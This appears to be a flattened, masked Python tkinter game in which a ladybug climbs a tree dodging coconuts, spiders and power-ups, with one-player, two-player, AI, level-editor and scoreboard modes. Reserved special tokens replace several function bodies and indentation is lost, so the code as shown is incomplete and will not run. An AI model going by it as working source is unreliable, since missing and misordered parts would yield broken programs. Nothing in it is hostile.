data.invincible.remove(powerUp) if data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.Invincible1 = True data.start1 = data.player1Y data.invincible.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. 
player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.Invincible2 = True data.start2 = data.player2Y data.invincible.remove(powerUp) class ScaryBug(object): def __init__(self, x, y): self.x = x self.y = y self.speed = 25 def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.spider) def onTimerFired(self, data): if data.mode == '2Player' or data.mode == 'AI': self.speed = 35 self.y -= self.speed if (data.mode == '1Player' or data.mode == 'levelCreated' and data. time % 8 == 0): side = random.choice(data.sides) if side == 'l': if self.x - data.lane >= data.Player1Min: self.x -= data.lane else: self.x += data.lane elif side == 'r': if self.x + data.lane <= data.Player1Max: self.x += data.lane else: self.x -= data.lane def hitScaryBug(data): for bug in data.scaryBug: if data.mode == '1Player' or data.mode == 'levelCreated': if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 * data.r): if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + 1.5 * data.r): data.hit = True data.lives = 0 data.levelEditorLives = 0 if data.mode == '2Player' or data.mode == 'AI': if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y + data.r): if (bug.x >= data.player1X - data.r and bug.x <= data. player1X + data.r): data.winner = 'player2' if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y + data.r): if (bug.x >= data.player2X - data.r and bug.x <= data. 
player2X + data.r): data.winner = 'player1' def drawPowerups(canvas, data): for bug in data.scaryBug: bug.draw(canvas, data) for powerUp in data.powerUps: powerUp.draw(canvas, data) for powerUp in data.invincible: powerUp.draw(canvas, data) def drawHome(canvas, data): canvas.create_image(data.homeX, data.homeY, image=data.home) <|reserved_special_token_0|> def powerUpCoconutShot(data): if data.time % 60 == 0 and data.time % 120 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 50 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 100 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) <|reserved_special_token_0|> def playerRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level, font='Arial 18 bold', fill='yellow') canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score, font='Arial 18 bold', fill='yellow') canvas.create_text(2 * data.width / 3, 660, text= """The greater the level, the more points get added to your score!""" , font='Arial 15 bold', fill='yellow') if data.hit == True: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') canvas.create_text(data.width / 2, 280, text='Score: %d' % data. 
score, font='Arial 13 bold', fill='yellow') if data.level >= 8: madeIt(canvas, data) drawHome(canvas, data) def madeIt(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 70, text='You Made it!', font= 'Arial 23 bold', fill='yellow') canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score, font='Arial 15 bold', fill='yellow') canvas.create_text(data.width / 2, 375, text= 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow') canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, 450, fill='white') canvas.create_text(data.width / 2, 425, text=data.name) def drop2Player(data): if data.winner == None and data.pauseDrops == False: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25: if data.pause1Drop != True: data.coconuts1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 12 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.coconuts1.append(Coconuts(140, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(540, 0)) elif side == 'r': if data.pause1Drop != True: data.coconuts1.append(Coconuts(344, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(755, 0)) powerupDrop2Player(data) def powerupDrop2Player(data): if data.time % 45 == 0 and data.time % 90 != 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.powerUps.append(PowerUps(140, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(540, 0)) elif side == 'r': if data.pause1Drop != True: data.powerUps.append(PowerUps(344, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(755, 0)) if data.time % 60 == 0: side = 
random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(540, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 90 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(540, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(755, 750)) def twoPlayerKeyPressed(event, data): if event.keysym == 'r': init(data) if data.winner == None: if event.keysym == 'a' and data.onLeft1 == False: data.onLeft1 = True data.player1X = 150 if event.keysym == 'd' and data.onLeft1 == True: data.onLeft1 = False data.player1X = 330 if event.keysym == 'Left' and data.onLeft2 == False: data.onLeft2 = True data.player2X = 550 if event.keysym == 'Right' and data.onLeft2 == True: data.onLeft2 = False data.player2X = 750 def twoPlayerMousePressed(event, data): checkHome(event, data) def twoPlayerTimerFired(data): if data.winner == None: data.player1Y -= data.speed if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 drop2Player(data) data.player2Y -= data.speed if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 drop2Player(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) powerupTimerFired(data) def powerupTimerFired(data): for coconut in data.coconuts1: if data.pause1Drop == False: coconut.onTimerFired(data) hit2Player(data) for coconut in data.coconuts2: if data.pause2Drop == False: 
coconut.onTimerFired(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def twoPlayerRedrawAll(canvas, data): canvas.create_image(data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_image(3 * data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10 ) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts1: coconut.draw(canvas) for coconut in data.coconuts2: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill= 'yellow') canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill ='yellow') winner(canvas, data) drawHome(canvas, data) def winner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 1', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 2', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. 
winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def editorKeyPressed(event, data): if event.keysym == 'r': init(data) def editorMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.yourSpeed = 'slow' data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.yourSpeed = 'medium' data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.yourSpeed = 'fast' data.fast = data.click data.slow, data.medium = data.notClick, data.notClick checkMiddle(event, data) checkLast(event, data) def checkMiddle(event, data): if data.medX - data.r <= event.y <= data.medX + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.rainSpeed = 'drizzle' data.drizzle = data.click data.rain, data.thunderstorm = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.rainSpeed = 'rain' data.rain = data.click data.drizzle, data.thunderstorm = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.rainSpeed = 'thunderstorm' data.thunderstorm = data.click data.drizzle, data.rain = data.notClick, data.notClick <|reserved_special_token_0|> def drawButtons(canvas, data): data.font, data.fill = 'Helvetica 13 bold', 'yellow' canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data. 
font, fill=data.fill) canvas.create_image(data.easyX, data.easyY, image=data.slow) canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font) canvas.create_image(data.medX, data.easyY, image=data.medium) canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font) canvas.create_image(data.hardX, data.easyY, image=data.fast) canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font) canvas.create_image(data.easyX, data.medX, image=data.drizzle) canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data. font, fill=data.fill) canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font) canvas.create_image(data.medX, data.medX, image=data.rain) canvas.create_text(data.medX, data.medX, text='Rain', font=data.font) canvas.create_image(data.hardX, data.medX, image=data.thunderstorm) canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font) canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data. font, fill=data.fill) canvas.create_image(data.easyY, data.last, image=data.yes) canvas.create_text(data.easyY, data.last, text='Yes', font=data.font) canvas.create_image(data.last, data.last, image=data.no) canvas.create_text(data.last, data.last, text='No', font=data.font) changeEnter(canvas, data) def changeEnter(canvas, data): if (data.powerUpsEditor != None and data.yourSpeed != None and data. 
rainSpeed != None): data.enter = data.click canvas.create_image(data.medX, data.enterX, image=data.enter) canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font) def editorTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) def editorRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.height / 2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.S_P - 10, text= 'Edit Your Level!', font='Arial 23 bold', fill='yellow') drawButtons(canvas, data) drawHome(canvas, data) def setEverything(data): if data.yourSpeed == 'slow': data.speed = 6 elif data.yourSpeed == 'medium': data.speed = 10 elif data.yourSpeed == 'fast': data.speed = 14 if data.rainSpeed == 'thunderstorm': data.rSpeed = 7 elif data.rainSpeed == 'rain': data.rSpeed = 10 elif data.rainSpeed == 'drizzle': data.rSpeed = 13 <|reserved_special_token_0|> def levelPowerUp(data): if data.powerUpsEditor == True: if data.time % 20 == 0 and data.time % 40 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 30 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 35 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) <|reserved_special_token_0|> def levelCreatedMousePressed(event, data): checkHome(event, data) def levelCreatedTimerFired(data): setEverything(data) if data.levelEditorLives > 0: data.cy -= data.speed if data.cy < 15: data.level += 1 if data.cy > 40: data.time += 1 if data.pauseDrops != True: levelCoconutShot(data) if data.powerUpsEditor == False: for coconut in data.coconuts: coconut.onTimerFired(data) hit(data) 
if data.powerUpsEditor == True: for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) for coconut in data.coconuts: if data.pauseDrops == False: coconut.onTimerFired(data) if data.beInvincible == False: hit(data) if data.start != None: if abs(data.start - data.cy) >= 120: data.pauseDrops, data.beInvincible = False, False def levelCreatedRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) if data.powerUpsEditor == True: drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data. levelEditorLives, font='Arial 20 bold', fill='yellow') canvas.create_text(data.width / 2, 660, text= """You lose a life for hitting a drop & don't get eaten!""", font='Arial 15 bold', fill='yellow') if data.levelEditorLives <= 0: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') if data.level > 1: winEditor(canvas, data) drawHome(canvas, data) def winEditor(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='You Made it!', font= 'Arial 23 bold', fill='yellow') <|reserved_special_token_0|> def difficultyMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.difficulty = data.difS data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.difficulty = data.difM data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.difficulty = data.difH data.fast = data.click data.slow, data.medium = data.notClick, data.notClick if data.enter == data.click: if data.enterY - data.r <= event.y <= data.enterY + data.r: if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.mode = 'AI' def difficultyTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) def difficultyRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.height / 2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) drawDifficulties(canvas, data) drawHome(canvas, data) def hitAI1(data, distance): for coconut in data.coconutsAI1: if (data.player1Y - data.r - coconut.y <= distance and data. 
switchOnProgress == False): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r or AISwitchBug(data, distance) == True): testInt = random.randint(0, 9) if testInt <= data.difficulty: data.switchOnProgress = True if data.player1X == 150: data.player1X = 340 else: data.player1X = 150 data.switchOnProgress = False if (coconut.y >= data.player1Y - data.r and coconut.y <= data. player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r): data.player1Y += 50 data.coconutsAI1.remove(coconut) def AISwitchBug(data, distance): for scaryBug in data.scaryBug: if (data.player1Y - data.r - scaryBug.y <= distance and data. switchOnProgress == False): if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data .player1X + data.r): return True def hitAI2(data, distance): for coconut in data.coconutsAI2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data. player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data. 
player2X + data.r): data.player2Y += 50 data.coconutsAI2.remove(coconut) def coconutShotAI(data): if data.winner == None: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40: if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 8 == 0: xPosition2 = random.randint(0, 80) xPosition3 = random.randint(364, 385) if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition2, 0)) data.coconutsAI1.append(Coconuts(xPosition3, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0)) data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0)) addExtraCoconut(data) addPowerUpsAI(data) <|reserved_special_token_0|> def addPowerUpsAI(data): if data.time % 33 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(550, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 66 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(550, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(750, 750)) <|reserved_special_token_0|> def AITimerFired(data): if data.winner == None: if data.Invincible1 == False: hitAI1(data, 31) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 31) for coconut in data.coconutsAI1: if data.pause1Drop == False: coconut.onTimerFired(data) for coconut in data.coconutsAI2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.Invincible1 == False: hitAI1(data, 13) if data.Invincible2 == True: pass elif data.Invincible2 == False: 
hitAI2(data, 13) data.player1Y -= data.speedAI if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 coconutShotAI(data) data.player2Y -= data.speedAI if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 coconutShotAI(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) powerUpAITimerFired(data) def powerUpAITimerFired(data): for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def AIRedrawAll(canvas, data): canvas.create_image(data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_image(3 * data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10 ) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconutsAI1: coconut.draw(canvas) for coconut in data.coconutsAI2: coconut.draw(canvas) canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill= 'yellow') canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill ='yellow') drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) AIWinner(canvas, data) drawHome(canvas, data) def AIWinner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. 
winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='The Computer Won :(', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! You Won!', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def scoreboardKeyPressed(event, data): if event.keysym == 'r': init(data) def scoreboardMousePressed(event, data): checkHome(event, data) def scoreboardTimerFired(data): difficultyTimerFired(data) def scoreboardRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.tbgY, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!', font='Arial 30 bold', fill='yellow') canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font= 'Arial 20 bold', fill='yellow') drawHome(canvas, data) data.savedScores data.savedScores = readFile('score.txt') score = data.savedScores.splitlines() scores = [] for line in score: scores.append(line.split(',')) scores = sorted(scores, key=lambda x: int(x[0])) top5 = scores[-data.numScores:] top5.reverse() for i in range(len(top5)): canvas.create_text(data.width / 2, data.scoreShift + i * 50, text= top5[i], font='Arial 18 bold', fill='yellow') def helpKeyPressed(event, data): if event.keysym == 'r': init(data) <|reserved_special_token_0|> def 
helpRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen) for drop in data.editorDrops: drop.draw(canvas) drawHome(canvas, data) def run(width=15000, height=25000): def redrawAllWrapper(canvas, data): canvas.delete(ALL) redrawAll(canvas, data) canvas.update() def mousePressedWrapper(event, canvas, data): mousePressed(event, data) redrawAllWrapper(canvas, data) def keyPressedWrapper(event, canvas, data): keyPressed(event, data) redrawAllWrapper(canvas, data) def timerFiredWrapper(canvas, data): timerFired(data) redrawAllWrapper(canvas, data) canvas.after(data.timerDelay, timerFiredWrapper, canvas, data) class Struct(object): pass data = Struct() data.width = width data.height = height data.timerDelay = 100 root = Tk() init(data) canvas = Canvas(root, width=data.width, height=data.height) canvas.pack() root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas, data)) root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data)) timerFiredWrapper(canvas, data) root.mainloop() print('bye!') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def init(data): data.score = 0 data.mode = 'splashScreen' data.timerDelay = 100 data.height = 800 data.width = 800 data.speed = 10 data.speedAI = 12 data.speedAI2 = 12 data.switchOnProgress = False data.r = 25 data.cx = 280 data.cy = 750 data.onLeft1, data.onLeft2 = True, True data.win = False data.coconuts = [] data.powerUps = [] data.coconuts1 = [] data.coconuts2 = [] data.coconutsAI1 = [] data.coconutsAI2 = [] data.invincible = [] data.pauseDrops = False data.pause1Drop = False data.pause2Drop = False init1(data) def init1(data): data.beInvincible = False data.Invincible1 = False data.Invincible2 = False data.scaryBug = [] data.time = 0 data.coconutFall = False data.sides = ['r', 'l'] data.level = 1 data.splashScreenTime = 0 data.splashScreenDrops = [] data.background = PhotoImage(file='tree.gif') data.deadScreen = 
PhotoImage(file='deadBug.gif') data.ladyBug = PhotoImage(file='lady.gif') data.winScreen = PhotoImage(file='treeTop1.gif') data.winBug = PhotoImage(file='littleBug.gif') data.halfBackground = PhotoImage(file='halfTree.gif') data.umbrella = PhotoImage(file='umbrella2.gif') data.spider = PhotoImage(file='spider.gif') data.hourGlass = PhotoImage(file='hourGlass.gif') data.splashScreen = PhotoImage(file='splash.gif') init2(data) def init2(data): data.tbg = PhotoImage(file='tbg2.gif') data.click = PhotoImage(file='click.gif') data.notClick = PhotoImage(file='notClick.gif') data.player1X = 150 data.player1Y = 750 data.player2X = 550 data.player2Y = 750 data.winner = None data.speed = 12 data.speed2 = 12 data.editorTime = 0 data.editorDrops = [] data.margin = 100 data.enter = False data.powerUpsEditor = None data.yourSpeed = None data.rainSpeed = None data.slow = data.notClick data.medium = data.notClick data.fast = data.notClick data.drizzle = data.notClick data.rain = data.notClick data.thunderstorm = data.notClick init3(data) def init3(data): data.yes = data.notClick data.no = data.notClick data.enter = data.notClick data.levelEditorLives = 2 data.rSpeed = None data.start = None data.start1 = None data.start2 = None data.difficulty = None data.mode1 = data.notClick data.mode2 = data.notClick data.mode3 = data.notClick data.mode4 = data.notClick data.mode5 = data.notClick data.mode6 = data.notClick data.home = PhotoImage(file='home.gif') data.helpScreen = PhotoImage(file='help1.gif') data.title = PhotoImage(file='title.gif') data.scoreList = [] data.spotList = [270, 364, 458, 552, 646, 740] data.savedScores = readFile('score.txt') if data.mode == 'levelCreated': setEverything(data) initsplashScreenNumbers(data) def initsplashScreenNumbers(data): data.splashButtonY = 425 data.p1ButtonX = 225 data.p2ButtonX = 290 data.edButton = 355 data.diffButton = 425 data.helpButton = 490 data.sboardButton = 555 data.hitPenalty = 75 data.splashText = data.height / 2 - 20 data.lives = 
2 data.levelMax = 8 data.lane = 94 data.Player1Min = 270 data.Player1Max = 740 data.homeX = 50 data.homeY = 650 initScoreBoardHelp(data) init1Player(data) def initScoreBoardHelp(data): data.tbgY = 5 * data.height / 12 data.txtTScore = 150 data.S_P = 220 data.numScores = 5 data.scorePos = data.height / 10 data.scoreShift = 270 data.helpY = data.height / 2 - 20 data.name = '' data.printName = '' data.hit = False initAI(data) def init1Player(data): data.buffer = 40 def initAI(data): data.AITY = 225 data.easyX = 200 data.easyY = 300 data.medX = 400 data.hardX = 600 data.enterY = 450 data.difS = 4 data.difM = 6 data.difH = 8 data.last = 500 data.enterX = 575 data.PUT = 450 data.RST = 350 data.YST = 250 def mousePressed(event, data): if data.mode == 'splashScreen': splashScreenMousePressed(event, data) elif data.mode == '1Player': playerMousePressed(event, data) elif data.mode == '2Player': twoPlayerMousePressed(event, data) elif data.mode == 'editor': editorMousePressed(event, data) elif data.mode == 'levelCreated': levelCreatedMousePressed(event, data) elif data.mode == 'AI': AIMousePressed(event, data) elif data.mode == 'difficulty': difficultyMousePressed(event, data) elif data.mode == 'scoreboard': scoreboardMousePressed(event, data) elif data.mode == 'help': helpMousePressed(event, data) def keyPressed(event, data): if data.mode == 'splashScreen': splashKeyPressed(event, data) elif data.mode == '1Player': playerKeyPressed(event, data) elif data.mode == '2Player': twoPlayerKeyPressed(event, data) elif data.mode == 'editor': editorKeyPressed(event, data) elif data.mode == 'levelCreated': levelCreatedKeyPressed(event, data) elif data.mode == 'AI': AIKeyPressed(event, data) elif data.mode == 'difficulty': difficultyKeyPressed(event, data) elif data.mode == 'scoreboard': scoreboardKeyPressed(event, data) elif data.mode == 'help': helpKeyPressed(event, data) def timerFired(data): if data.mode == 'splashScreen': splashScreenTimerFired(data) elif data.mode == '1Player': 
playerTimerFired(data) elif data.mode == '2Player': twoPlayerTimerFired(data) elif data.mode == 'editor': editorTimerFired(data) elif data.mode == 'levelCreated': levelCreatedTimerFired(data) elif data.mode == 'AI': AITimerFired(data) elif data.mode == 'difficulty': difficultyTimerFired(data) elif data.mode == 'scoreboard': scoreboardTimerFired(data) elif data.mode == 'help': helpTimerFired(data) def redrawAll(canvas, data): if data.mode == 'splashScreen': splashScreenRedrawAll(canvas, data) elif data.mode == '1Player': playerRedrawAll(canvas, data) elif data.mode == '2Player': twoPlayerRedrawAll(canvas, data) elif data.mode == 'editor': editorRedrawAll(canvas, data) elif data.mode == 'levelCreated': levelCreatedRedrawAll(canvas, data) elif data.mode == 'AI': AIRedrawAll(canvas, data) elif data.mode == 'difficulty': difficultyRedrawAll(canvas, data) elif data.mode == 'scoreboard': scoreboardRedrawAll(canvas, data) elif data.mode == 'help': helpRedrawAll(canvas, data) def splashScreenMousePressed(event, data): if (data.splashButtonY - 2 * data.r <= event.x <= data.splashButtonY + 2 * data.r): if data.p1ButtonX - data.r <= event.y <= data.p1ButtonX + data.r: data.mode = '1Player' if data.p2ButtonX - data.r <= event.y <= data.p2ButtonX + data.r: data.mode = '2Player' if data.edButton - data.r <= event.y <= data.edButton + data.r: data.mode = 'editor' if data.diffButton - data.r <= event.y <= data.diffButton + data.r: data.mode = 'difficulty' if data.helpButton - data.r <= event.y <= data.helpButton + data.r: data.mode = 'help' if data.sboardButton - data.r <= event.y <= data.sboardButton + data.r: data.mode = 'scoreboard' def splashKeyPressed(event, data): pass def splashScreenTimerFired(data): data.splashScreenTime += 1 if data.splashScreenTime % 2 == 1: rainDropSplash(data) for drop in data.splashScreenDrops: drop.onTimerFired(data) def splashScreenButtons(canvas, data): canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1) 
